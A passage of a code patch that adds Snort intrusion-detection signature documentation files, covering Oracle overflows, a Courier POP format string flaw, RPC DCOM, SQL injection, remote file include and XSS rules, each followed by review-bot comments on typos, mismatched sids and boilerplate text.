+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+
+--
+Additional References:
+
+Symantec
+http://securityresponse.symantec.com/avcenter/venc/data/trojan.linux.typot.html
+
+e-week
+http://www.eweek.com/article2/0,3959,1130759,00.asp
+
+Intrusec
+http://www.intrusec.com/55808.html
+
+--
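Review bot: Corrective Action tells the reader to "Investigate the affected host", but Detailed Information states that the source IP address of the scanning traffic is spoofed, so the source address in the alert does not identify an infected machine; say explicitly that the infected host has to be located by other means, for example the "r" file next to the binary, the "/tmp/a" file, the libpcap/libnet dependencies or the outbound ssh connection described above. "Sourcefire Research Team" is listed twice under Contributors, and "succesful" should be "successful".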
--- /dev/null
+++ b/doc/signatures/2905.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2905
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
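Review bot: same formatting problems as the other dbms_repcat files in this patch: the line break before ". This procedure is included in" splits the sentence, "Oracle Oracle9i" duplicates the vendor name, and Additional References is empty while Corrective Action points to a vendor patch. Since these Oracle files differ only in the procedure and package names (here create_snapshot_repschema in sys.dbms_repcat_sna), fixing the shared template once and regenerating would be cleaner than editing each file by hand.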
--- /dev/null
+++ b/doc/signatures/1164.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1164
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
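Review bot: third verbatim copy of the generic web-attack text (see 1207.txt and 1057.txt in this patch); nothing in the file says what sid 1164 actually matches. Add the URI or pattern the rule looks for and the affected product, and drop "All systems using a web server." from Affected Systems.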
--- /dev/null
+++ b/doc/signatures/2008.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2008
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to CVS using the credentials of a user with escalated privileges. Should
+this attempt be succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+determined activity by an attacker to gain unauthorized access to the 
+CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure and contents is vulnerable.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to CVS using the credentials of an authorized user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type their username.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
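Review bot: the Summary describes what CVS is rather than what the event is; move that description into Detailed Information and make the Summary say what triggers the rule, which according to Detailed Information is a failed attempt to connect to the CVS server. The sentence "attempts to connect to a CVS repository that fail due determined activity by an attacker" is missing "to" and reads as if every failed connection is an attack, which the False Positives section contradicts (a mistyped username also fails). Corrective Action first says to disable the daemon in "/etc/inetd.conf" and then describes how to run it; state that disabling applies when the service is not needed and the non-root, no-login user applies otherwise. Typos: "succesful" (twice), "respository".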
--- /dev/null
+++ b/doc/signatures/2666.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2664
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against a POP server.
+
+--
+Impact:
+Serious. A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the POP daemon.
+
+--
+Detailed Information:
+Some versions of the Courier POP daemon are vulnerable to format string
+exploits prior to and during authentication to the POP server.  A
+successful exploit attempt could result in the remote attacker gaining
+unauthorized root access to a vulnerable system.
+
+--
+Affected Systems:
+	Courier IMAP/POP server versions 1.6 though 3.0.2
+
+--
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+
+--
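Review bot: the Sid line reads "2664" but the file is "2666.txt"; one of them is wrong, and any lookup keyed on the sid will either miss this rule or return this text for a different one. Check which sid the Courier POP format string rule actually carries and make the filename and Sid line agree. Also "1.6 though 3.0.2" should be "through", "an gain control" should be "and gain control", and there are stray blank lines after the "--" separators before Ease of Attack, Corrective Action, Contributors and Additional References.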
--- /dev/null
+++ b/doc/signatures/1448.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1448
+
+--
+Summary:
+This event is generated when a request is sent to the Microsoft
+Terminal Server port.
+
+--
+Impact:
+Denial of service. Sending repeated requests may cause a denial of
+service by consuming all available memory resources.
+
+--
+Detailed Information:
+A flaw exists in the Microsoft Terminal Server port on certain versions
+of Windows that may cause a denial of service of the vulnerable host by
+consuming all available memory resources.  This attack requires multiple
+packets to cause a denial of service.
+
+--
+Affected Systems:
+Microsoft Windows 2000 Advanced Server SP2
+Microsoft Windows 2000 Advanced Server SP1
+Microsoft Windows 2000 Advanced Server
+Microsoft Windows 2000 Datacenter Server SP2
+Microsoft Windows 2000 Datacenter Server SP1
+Microsoft Windows 2000 Datacenter Server
+Microsoft Windows 2000 Server SP2
+Microsoft Windows 2000 Server SP1
+Microsoft Windows 2000 Server
+Microsoft Windows NT Terminal Server 4.0
+
+--
+Attack Scenarios:
+An attacker may attempt to cause a denial of service against a
+vulnerable server by sending repeated requests.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patches discussed in Microsoft Security Bulletin MS01-040.
+Block access to the Microsoft Terminal Server port from outside the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0540
+
+--
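Review bot: the Summary says the event fires "when a request is sent to the Microsoft Terminal Server port", which would make every legitimate Terminal Server connection an alert, yet False Positives says "None Known."; either describe the specific malformed request the rule matches, or list normal Terminal Server traffic as a false positive. Detailed Information says the denial of service "requires multiple packets", so a single event is not evidence of an attack; note that the volume of events is what matters. Corrective Action cites MS01-040 by name; add the bulletin URL under Additional References next to the CVE link.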
--- /dev/null
+++ b/doc/signatures/100000765.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000765
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "LifeType" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "date" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "date" parameter in the "index.php" script used by the "LifeType" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using LifeType
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
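Review bot: the separators are inconsistent with the rest of the set: "--" directly follows the Sid, Affected Systems and Contributors lines with no blank line between, whereas every other file has one. "ona web server" should be "on a web server", and "an exploitation attempt has been attempted" is redundant. The credential-validation paragraph in Detailed Information is the same boilerplate used in the remote file include files and does not describe SQL injection through the "date" parameter; drop or replace it, since the Attack Scenarios paragraph already states the real scenario correctly.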
--- /dev/null
+++ b/doc/signatures/381.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+381
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Solaris host running SING software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Solaris host running SING software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS448
+
+--
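Review bot: "legimately" should be "legitimately", and "Steven Alexander<alexander.s@mccd.edu>" lacks the space before the address, exactly as in 379.txt. Corrective Action "Block inbound ICMP echo requests." is the same blanket advice as 379.txt and has the same problem: the rule fingerprints the SING payload, so the action is to record the scanning source and apply the site's ICMP policy, not to block all pings that the False Positives section says are used for troubleshooting.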
--- /dev/null
+++ b/doc/signatures/2899.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2899
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
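Review bot: the procedure name in Detailed Information is split across lines with a stray period on its own line ("vulnerability in the procedure drop_update_resolution" / ". This procedure is included in"); this looks like a template substitution that was never reflowed, so please join it into "vulnerability in the procedure drop_update_resolution. This procedure is included in sys.dbms_repcat_conf." Also "Oracle Oracle9i" under Affected Systems repeats the vendor name, and Additional References is empty for what the text calls a known vulnerability; a vendor advisory link would let the reader verify which patch applies.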
--- /dev/null
+++ b/doc/signatures/3324.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3324
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
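Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match the Detailed Information, which describes a malformed RPC request to an RPC port causing the overflow; one of the two should be corrected so the reader knows what traffic the rule is actually looking for. Also "Expoit" in Ease of Attack should be "Exploit", and Additional References is empty for a known vulnerability that has vendor patches.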
--- /dev/null
+++ b/doc/signatures/1125.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1125
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
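Review bot: this document is generic to the point of not saying what SID 1125 actually detects; Summary, Detailed Information and Attack Scenarios all describe web server attacks in the abstract and the Additional References section is empty. Suggest naming the specific request pattern or product the rule matches. Minor: "attackers choosing" should be "attacker's choosing".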
--- /dev/null
+++ b/doc/signatures/1746.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1746
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cachefsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cachefsd is using.  Attackers can also learn what versions of the cachefsd protocol are accepted by cachefsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cachefsd run.  The cachefsd RPC service is used by Solaris hosts to cache requests for remote file systems mounted by the Network File System (NFS).  There is a vulnerability associated with cachefsd that may cause a buffer overflow, allowing an attacker to execute abitrary code with the privileges of cachefsd, possibly root. 
+
+--
+Affected Systems:
+Solaris 2.5.1, 2.6, 7, 8, 9 
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cachefsd runs.  This may be a precursor to an attack to exploit the cachefsd buffer overflow.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user is allowed to perform NFS mounts, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cachefsd, not probes of the cachefsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cachefsd service itself. An attacker may attempt to go directly to the cachefsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-0084
+
+Bugtraq:
+http://www.securityfocus.com/bid/4674
+
+
+--
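Review bot: typo in Detailed Information, "abitrary" should be "arbitrary". The Corrective Action sentence "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines." reads as though the machines themselves are being denied access; suggest "to ensure external access to RPC-enabled machines is denied". There are also two consecutive blank lines before the closing separator.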
--- /dev/null
+++ b/doc/signatures/100000664.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000664
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "name" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
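Review bot: the Impact section overstates the finding; Detailed Information and Attack Scenarios describe a cross site scripting issue via the "name" parameter of "edit.php" in which a user clicks a malicious link, yet Impact claims possible administrative access to the server and execution of arbitrary code. Suggest reducing Impact to what XSS actually yields (theft of session data or credentials, actions performed in the victim's browser context). Also the blank line before the "--" separator is missing after the Sid and Affected Systems sections, unlike the other files in this patch.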
--- /dev/null
+++ b/doc/signatures/100000756.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000756
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "history.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "history.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
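Review bot: the third paragraph of Detailed Information and the Attack Scenarios section are the generic CGI credential-validation boilerplate ("An attacker can access an authentication mechanism and supply his/her own credentials") and do not describe the remote file include via "qb_path" in "history.php" that the Summary documents; suggest replacing them with a scenario in which "qb_path" is pointed at a host the attacker controls. Also "ona web server" should be "on a web server", and the file opens with two stray blank lines.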
--- /dev/null
+++ b/doc/signatures/892.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+892
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
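Review bot: typo in Detailed Information, "ona web server" should be "on a web server"; the line ending "can be exploited by the attacker." is also not wrapped at the column width used by the rest of the paragraph. The Summary describes "a known vulnerability in a CGI web application" without naming the application or request pattern SID 892 matches, and Additional References is empty.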
--- /dev/null
+++ b/doc/signatures/100000520.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000520
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Xarancms" application running on a webserver. Access to 
+the file "xaramcms_haupt.php" with SQL commands being passed as the "id" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "xaramcms_haupt.php" script used 
+by the "Xarancms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Xarancms
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
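Review bot: the application name is spelled "Xarancms" in the Summary and Detailed Information but the script is "xaramcms_haupt.php"; please confirm whether the product is Xarancms or Xaramcms so the document is consistent. The second paragraph of Detailed Information is a comma splice ("...for the application, the attacker may also be able to...") and should be split into two sentences. As in the other CGI documents, "ona web server" should be "on a web server", and the credential-validation boilerplate paragraph does not describe an SQL injection.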
--- /dev/null
+++ b/doc/signatures/2711.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2711
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_flavor_change
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
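Review bot: same reflow problem as in 2899.txt: the procedure name "end_flavor_change" is followed by a period on its own line and the package name "dbms_offline_og." sits on another; join these into one sentence. "Oracle Oracle9i" under Affected Systems repeats the vendor name, and Additional References is empty.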
--- /dev/null
+++ b/doc/signatures/1035.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1035
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
